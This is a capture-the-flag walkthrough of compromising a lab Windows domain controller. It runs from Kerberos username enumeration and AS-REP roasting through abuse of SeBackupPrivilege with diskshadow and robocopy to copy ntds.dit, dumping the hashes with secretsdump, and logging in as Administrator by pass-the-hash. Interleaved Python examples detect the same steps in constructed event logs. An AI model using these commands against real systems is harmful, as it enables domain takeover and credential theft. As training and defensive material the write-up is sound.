# Fusion Corp

## Nmap

```
sudo nmap 10.10.75.130 -sS -sV -p-

PORT      STATE SERVICE       VERSION
80/tcp    open  http          Microsoft IIS httpd 10.0
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2021-06-20 13:33:25Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: fusion.corp0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: fusion.corp0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp  open  mc-nmf        .NET Message Framing
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49672/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49673/tcp open  msrpc         Microsoft Windows RPC
49678/tcp open  msrpc         Microsoft Windows RPC
49690/tcp open  msrpc         Microsoft Windows RPC
49697/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: FUSION-DC; OS: Windows; CPE: cpe:/o:microsoft:windows
```

Starting off I attempted basic `SMB` enumeration but found nothing useful. I then moved to `LDAP` and used the `Nmap` script scan shown below to pull domain information.

```bash
nmap -n -sV --script "ldap* and not brute" <IP>
```

From this we ascertain the domain name is 'Fusion.Corp' (the Nmap service banner above shows it as `fusion.corp0.`). With the domain name known we can start enumerating Kerberos.

**Kerberos**

**Install Kerbrute:** [**https://github.com/ropnop/kerbrute**](https://github.com/ropnop/kerbrute)

```
./kerbrute userenum /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt -d fusion.corp --dc 10.10.7.24 -v | grep 'VALID USERNAME:'
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-854e64fb2cd3abb61ef0b1ed8a0ac26614a45d87%2Fimage.png?alt=media)

I stored the two discovered usernames in a file and then ran GetNPUsers from Impacket against them, writing any AS-REP hashes returned for accounts without Kerberos pre-authentication to a file called 'asrep-hashes'.

```
python2 GetNPUsers.py <Domain>/ -usersfile <File> -format hashcat -outputfile <File>
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-caa25423e30fa4ac34b32626b59a68ac66a5c848%2Fimage.png?alt=media)

Viewing the contents of asrep-hashes we see we have a hash for the user lparker.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-7555c9a5dbd89e44fba31eed61091f79bbf4ba5d%2Fimage.png?alt=media)

Running the file through Hashcat in mode 18200 (Kerberos 5 AS-REP, etype 23) cracks the password quickly.

```
hashcat -m 18200 -a 0 asrep-hashes /usr/share/wordlists/rockyou.txt 
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-400c5a03af085d43460589b8b2b36ae9925e88c1%2Fpng1.png?alt=media)
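The username enumeration and AS-REP roasting steps above both leave traces on the domain controller. The following is an added defender-side example, not part of the original write-up: it lists accounts whose `userAccountControl` has the `UF_DONT_REQUIRE_PREAUTH` bit (0x400000) set, which is the misconfiguration that makes AS-REP roasting possible, and it runs two detections over Security event 4768 (TGT request) records. The event lines and directory snapshot are constructed and use a simplified `key=value` rendering rather than the real EVTX layout; the field names, the `threshold` and the sample IPs are assumptions.

```python
"""Defender-side checks for the AS-REP roasting path.

All sample data is constructed. Events use a simplified key=value rendering
of Windows Security event 4768 fields (not the real XML/EVTX layout).
"""
import re
from collections import Counter

# userAccountControl flag that disables Kerberos pre-authentication
# (UF_DONT_REQUIRE_PREAUTH). Accounts carrying it are AS-REP roastable.
UF_DONT_REQUIRE_PREAUTH = 0x400000
UF_NORMAL_ACCOUNT = 0x200

# Constructed directory snapshot: what an LDAP query for
# sAMAccountName / userAccountControl might return.
SAMPLE_ACCOUNTS = [
    {"sAMAccountName": "lparker", "userAccountControl": UF_NORMAL_ACCOUNT | UF_DONT_REQUIRE_PREAUTH},
    {"sAMAccountName": "jmurphy", "userAccountControl": UF_NORMAL_ACCOUNT},
    {"sAMAccountName": "svc_legacy", "userAccountControl": UF_NORMAL_ACCOUNT | UF_DONT_REQUIRE_PREAUTH},
]


def find_preauth_disabled(accounts):
    """Return the account names whose pre-authentication is disabled."""
    return sorted(a["sAMAccountName"] for a in accounts
                  if a["userAccountControl"] & UF_DONT_REQUIRE_PREAUTH)


# Constructed 4768 records. Status 0x0 = success, 0x6 = KDC_ERR_C_PRINCIPAL_UNKNOWN
# (the result a username-guessing tool produces for names that do not exist).
# PreAuthType 0 = no pre-authentication, Etype 0x17 = RC4-HMAC.
SAMPLE_EVENTS = """\
EventID=4768 Account=lparker Client=10.10.14.5 PreAuthType=0 Etype=0x17 Status=0x0
EventID=4768 Account=jmurphy Client=10.10.14.5 PreAuthType=2 Etype=0x12 Status=0x0
EventID=4768 Account=bob Client=10.10.14.5 PreAuthType=0 Etype=0xffffffff Status=0x6
EventID=4768 Account=alice Client=10.10.14.5 PreAuthType=0 Etype=0xffffffff Status=0x6
EventID=4768 Account=carol Client=10.10.14.5 PreAuthType=0 Etype=0xffffffff Status=0x6
EventID=4768 Account=jmurphy Client=10.10.20.7 PreAuthType=2 Etype=0x12 Status=0x0
EventID=4769 Account=jmurphy Client=10.10.20.7 Etype=0x12 Status=0x0
"""

KV = re.compile(r"(\w+)=(\S+)")


def parse_events(text):
    """Turn the key=value lines into a list of dicts."""
    return [dict(KV.findall(line)) for line in text.splitlines() if line.strip()]


def detect_asrep_roast(events):
    """TGTs issued without pre-authentication using the RC4 etype.

    A successful 4768 with PreAuthType 0 means the KDC handed out an
    encrypted AS-REP without any proof of the password, which is exactly
    what GetNPUsers collects. Returns (account, client) pairs.
    """
    return [(e["Account"], e["Client"]) for e in events
            if e.get("EventID") == "4768" and e.get("Status") == "0x0"
            and e.get("PreAuthType") == "0" and e.get("Etype") == "0x17"]


def detect_user_enum(events, threshold=3):
    """Clients producing many 4768 failures for unknown principals (0x6)."""
    counts = Counter(e["Client"] for e in events
                     if e.get("EventID") == "4768" and e.get("Status") == "0x6")
    return {ip: n for ip, n in counts.items() if n >= threshold}


if __name__ == "__main__":
    print("pre-auth disabled:", find_preauth_disabled(SAMPLE_ACCOUNTS))
    evs = parse_events(SAMPLE_EVENTS)
    print("AS-REP roast candidates:", detect_asrep_roast(evs))
    print("username enumeration sources:", detect_user_enum(evs))
```

The remediation for the first check is to clear the "Do not require Kerberos preauthentication" flag on the affected accounts (and give any that genuinely need it a long, random password, since the AS-REP is only as strong as the password it is encrypted with). Accounts that are exempted on purpose should be fed into an allowlist before the 4768 detection is turned on, otherwise every legitimate logon from such an account fires the rule.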

The cracked credentials can then be used against WinRM on port 5985 with Evil-WinRM.

```
evil-winrm -i 10.10.22.38 -u lparker -p '<Password>'
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-14d753113473548a6b2bc5f0ba9fef032a939da9%2FCapture_1.png?alt=media)

After grabbing the user flag from the Desktop I started working through basic enumeration. Checking user accounts first, the entry for the user jmurphy contains some interesting information.

```
net user jmurphy
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-dbbdaeb249cdf475a17ed1127565930b20ed3b37%2FCapture_2.png?alt=media)

We are then able to log in with Evil-WinRM as jmurphy using the new credentials.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-55cb79981d69e7077cfbe57f1c57b64ed792a8fe%2FCapture_3.png?alt=media)

Again, the user flag can be grabbed from the Desktop. The output in the image above also shows that this user holds the 'SeBackupPrivilege' privilege.

SeBackupPrivilege lets a process open any file on the system for reading regardless of its ACL, which is the access a backup agent needs. Knowing this, a high-value target is ntds.dit, the Active Directory database that stores the password hashes of every domain object and user. The file is held open by the directory service at all times, so a plain copy fails: the system keeps the file locked.

What we can do instead is write a DSH script for the diskshadow utility. The script creates a Volume Shadow Copy of the C: drive and exposes it under a new drive letter; the copy of ntds.dit inside the snapshot is not locked and can be read with the backup privilege.

First, create a file called `viper.dsh` on the attacking machine with the following contents (a persistent, no-writers shadow copy of `c:` aliased as `viper`, then exposed as drive `x:`):

```
set context persistent nowriters
add volume c: alias viper
create
expose %viper% x:
```

Once the file is written, run `unix2dos` on it so it uses DOS (CRLF) line endings, which diskshadow expects.

```
unix2dos viper.dsh
```

Then on the target system create a directory `c:\temp` and upload the `viper.dsh` file into it.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-d0c83a0360d70db5fb0a744996687dfcd1561812%2Fimage.png?alt=media)

From here run the following commands:

```
diskshadow /s viper.dsh
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-9c51dc7474fa8decd2a203bde3adda1d4faf7fd4%2Fimage.png?alt=media)

```
robocopy /b x:\windows\ntds . ntds.dit
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-2d0dc860f1edca4deaf0056fa113231575787d5a%2Fimage.png?alt=media)

Next, save the SYSTEM registry hive. Impacket needs the boot key it contains to decrypt the password hashes stored in ntds.dit.

```
reg save hklm\system c:\Temp\system
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-c125eeac49caad1b28dde8de8cb64bacdd2d264e%2Fimage.png?alt=media)

We can then use Evil-WinRM's `download` command to pull ntds.dit and the SYSTEM hive back to the attacking machine.

```
download ntds.dit
download system
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-f868d0fba9a37b1fe4907cd7b5d0002767000d2b%2Fimage.png?alt=media)

Back on the attacking machine use the following command with Impacket to extract the hashes from ntds.dit.

```
python2 secretsdump.py -ntds ntds.dit -system system local
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-0bd9fcfa2322ac3f2b55fbf0cdead7bb2b7c4359%2FCapture_4.png?alt=media)
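The whole chain from SeBackupPrivilege to the extracted hashes is visible in Security event logs: 4672 (special privileges assigned to a new logon) records which accounts received SeBackupPrivilege, and 4688 (process creation, with the "include command line in process creation events" policy enabled) records the diskshadow, robocopy and reg.exe invocations shown above. The following is an added detection example, not part of the original write-up; the event lines are constructed in a simplified `key=value` form, and the `allowed` backup-account allowlist, the indicator names and the `min_indicators` threshold are assumptions.

```python
"""Detection logic for the SeBackupPrivilege -> diskshadow -> ntds.dit chain.

Sample events are constructed and use a simplified key=value rendering of
Security events 4688 (process creation with command line) and 4672
(special privileges assigned to new logon); they are not real EVTX records.
"""
import re
from collections import defaultdict

# Constructed sample events (raw string so the Windows backslashes survive).
SAMPLE_EVENTS = r"""
EventID=4672 User=jmurphy Privileges=SeBackupPrivilege,SeRestorePrivilege
EventID=4688 User=jmurphy Process=C:\Windows\System32\diskshadow.exe CommandLine="diskshadow /s viper.dsh"
EventID=4688 User=jmurphy Process=C:\Windows\System32\Robocopy.exe CommandLine="robocopy /b x:\windows\ntds . ntds.dit"
EventID=4688 User=jmurphy Process=C:\Windows\System32\reg.exe CommandLine="reg save hklm\system c:\Temp\system"
EventID=4672 User=svc_backup Privileges=SeBackupPrivilege
EventID=4688 User=svc_backup Process=C:\Windows\System32\Robocopy.exe CommandLine="robocopy /b D:\shares E:\backup /mir"
EventID=4688 User=lparker Process=C:\Windows\System32\cmd.exe CommandLine="cmd /c net user jmurphy"
"""

# key=value pairs; a value may be a double-quoted string containing spaces.
KV = re.compile(r'(\w+)=("[^"]*"|\S+)')


def parse_events(text):
    """Turn the key=value lines into a list of dicts (quotes stripped)."""
    out = []
    for line in text.splitlines():
        if line.strip():
            out.append({k: v.strip('"') for k, v in KV.findall(line)})
    return out


# Each chain step as (indicator name, predicate over the lower-cased command line).
INDICATORS = [
    ("diskshadow_script", lambda c: c.startswith("diskshadow") and " /s" in c),
    ("ntds_backup_copy", lambda c: c.startswith("robocopy") and " /b" in c and "ntds" in c),
    ("system_hive_export", lambda c: c.startswith("reg") and " save" in c and "hklm\\system" in c),
]


def unexpected_backup_privilege(events, allowed=("svc_backup",)):
    """Accounts granted SeBackupPrivilege at logon that are not on the allowlist.

    `allowed` is an assumed list of accounts expected to hold the privilege
    (a real backup service account, for instance).
    """
    users = set()
    for e in events:
        if e.get("EventID") == "4672":
            privs = e.get("Privileges", "").split(",")
            if "SeBackupPrivilege" in privs and e["User"] not in allowed:
                users.add(e["User"])
    return sorted(users)


def ntds_theft_indicators(events):
    """Map user -> sorted indicator names seen in that user's 4688 events."""
    seen = defaultdict(set)
    for e in events:
        if e.get("EventID") != "4688":
            continue
        cmd = e.get("CommandLine", "").lower()
        for name, matches in INDICATORS:
            if matches(cmd):
                seen[e["User"]].add(name)
    return {user: sorted(names) for user, names in seen.items()}


def alerts(events, min_indicators=2):
    """Users that performed at least `min_indicators` distinct steps of the chain."""
    return sorted(user for user, names in ntds_theft_indicators(events).items()
                  if len(names) >= min_indicators)


if __name__ == "__main__":
    evs = parse_events(SAMPLE_EVENTS)
    print("unexpected SeBackupPrivilege:", unexpected_backup_privilege(evs))
    print("chain indicators:", ntds_theft_indicators(evs))
    print("alerts:", alerts(evs))
```

Requiring two distinct steps before alerting keeps a legitimate backup job (robocopy `/b` over a file share, as the `svc_backup` line shows) from firing the rule on its own, while the combination of a scripted shadow copy, a backup-mode copy of ntds.dit and an export of the SYSTEM hive by one account is hard to explain innocently. The durable fix is to keep SeBackupPrivilege (in practice, Backup Operators and Server Operators membership) off ordinary user accounts, particularly on domain controllers.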

This gives us the Administrator NT hash, which Evil-WinRM can use directly (pass-the-hash) to log in to the target system.

```
evil-winrm -i <IP> -u administrator -H '<NT-Hash>'
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-c74180847ef05d02cccd073720e0b9ff635cd38d%2FCapture_5.png?alt=media)

We are now Administrator on the Domain Controller and can grab the final flag from the Desktop.

